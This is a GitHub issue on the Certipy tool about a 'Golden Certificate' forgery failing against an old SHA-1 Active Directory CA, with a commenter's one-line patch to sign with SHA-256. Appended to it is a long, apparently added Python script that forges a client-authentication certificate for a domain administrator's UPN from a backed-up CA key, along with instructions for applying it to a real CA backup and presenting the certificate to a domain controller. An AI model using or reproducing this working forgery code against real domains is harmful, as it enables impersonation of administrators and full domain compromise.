Golden Certificate - Unsupported Algorithm - SHA1 #214

Open
secu77 opened this issue May 27, 2024 · 1 comment

Comments


secu77 commented May 27, 2024

Hello,

I have been trying to exploit the attack known as “Golden Certificate” using Certipy and have experienced some errors specific to this scenario. The CA is located on a fairly old Windows machine (I think it is Windows Server 2003 if I am not mistaken). The first step, the backup of the CA's private key and certificate, is successful. However, when I try to forge a certificate for a user (in this case, the Domain Administrator), an error occurs related to the creation of the certificate. Apparently SHA-1 is used, and I believe that this algorithm is completely deprecated and that is where the failure is.

I do not know much about certificates, so I do not know very well if you can implement an end to generate certificates using this algorithm, or edit the PFX of the CA, or something. It is a very particular scenario; I had never encountered a CA on such an old computer, so I report this bug so that, if someone has the same problem, there is a place to give more detail.

Greetings and thank you very much for the fantastic tool. Hopefully this can be solved.

@iDigitalFlame

Hello!

I'm not a maintainer or anything for this project, but I had the same error as you do and I figured out how to fix it.

You need to manually edit the certipy/commands/forge.py file and change line 231.

Originally it's:

cert = cert.sign(ca_key, signature_hash_algorithm())

Change it to:

from cryptography.hazmat.primitives.hashes import SHA256
cert = cert.sign(ca_key, SHA256())

Once that's done, it should work fine for you!
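The two one-line snippets above differ only in which hash the forged certificate is signed with. The following is an added example, not Certipy's forge.py and not code from either participant: it loads a CA backup from a PKCS#12 file, keeps the CA certificate's own signature hash when it is modern but switches to SHA-256 when that hash is SHA-1 (or MD5, or absent), builds a client-authentication certificate carrying the target account's UPN in the Subject Alternative Name, and verifies the result against the CA's public key. The helper names, the throwaway demo CA, and the UPN administrator@corp.local are this example's own assumptions; the tiny DER encoder for the UPN OtherName is written here rather than taken from any library.

```python
"""Forge a client-auth certificate with a backed-up CA key, picking a signature
hash that the local cryptography/OpenSSL build accepts even when the CA's own
certificate is SHA-1 signed.  Added example; not Certipy's forge.py."""
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID

# szOID_NT_PRINCIPAL_NAME: the OtherName type Windows uses for a UPN in the SAN.
UPN_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")

# Hashes we refuse to sign with even when the CA certificate itself used them.
WEAK_HASHES = (hashes.MD5, hashes.SHA1)


def choose_signing_hash(ca_hash):
    """Pick the hash for the forged certificate's signature.

    ca_hash is ca_cert.signature_hash_algorithm.  Mirroring it (what the
    unpatched line does) fails on old CAs with a SHA-1 signed certificate.
    A relying party verifies each signature with the algorithm named in that
    certificate, so the leaf's hash need not match the CA certificate's.
    """
    if ca_hash is None or isinstance(ca_hash, WEAK_HASHES):
        return hashes.SHA256()
    return ca_hash


def der_utf8string(text):
    """Minimal DER encoder for UTF8String (tag 0x0C); OtherName wants raw DER."""
    data = text.encode("utf-8")
    n = len(data)
    if n < 0x80:
        length = bytes([n])
    else:
        n_bytes = (n.bit_length() + 7) // 8
        length = bytes([0x80 | n_bytes]) + n.to_bytes(n_bytes, "big")
    return b"\x0c" + length + data


def load_ca_pfx(pfx_bytes, password=None):
    """(ca_key, ca_cert) from a PKCS#12 backup such as the CA backup step produces."""
    key, cert, _chain = pkcs12.load_key_and_certificates(pfx_bytes, password)
    return key, cert


def forge_certificate(ca_cert, ca_key, upn, subject_key, days=365):
    """Issue a client-authentication certificate for `upn`, signed by the CA key."""
    now = datetime.datetime.now(datetime.timezone.utc)
    builder = (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, upn.split("@")[0])]))
        .issuer_name(ca_cert.subject)
        .public_key(subject_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=days))
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False)
        .add_extension(
            x509.SubjectAlternativeName([x509.OtherName(UPN_OID, der_utf8string(upn))]),
            critical=False,
        )
    )
    return builder.sign(ca_key, choose_signing_hash(ca_cert.signature_hash_algorithm))


def signed_by(leaf, ca_cert):
    """True if the leaf's RSA PKCS#1 v1.5 signature verifies under the CA's public key."""
    try:
        ca_cert.public_key().verify(
            leaf.signature, leaf.tbs_certificate_bytes,
            padding.PKCS1v15(), leaf.signature_hash_algorithm,
        )
        return True
    except InvalidSignature:
        return False


def make_demo_ca_pfx():
    """Constructed stand-in for the CA backup: a throwaway self-signed RSA CA as PFX."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "demo-CA")])
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name).issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=3650))
        .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
        .sign(key, hashes.SHA256())
    )
    return pkcs12.serialize_key_and_certificates(
        b"demo-CA", key, cert, None, serialization.NoEncryption()
    )


if __name__ == "__main__":
    ca_key, ca_cert = load_ca_pfx(make_demo_ca_pfx())
    user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    leaf = forge_certificate(ca_cert, ca_key, "administrator@corp.local", user_key)
    print(leaf.signature_hash_algorithm.name, signed_by(leaf, ca_cert))
```

Against a real backup, replace make_demo_ca_pfx() with the bytes of the exported PFX (and its password, if any); the forged certificate and the user key can then be bundled with pkcs12.serialize_key_and_certificates for whatever tool does the authentication. The signed_by check is worth running every time: it confirms the forged leaf actually verifies under the CA's public key before it is presented to a domain controller.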
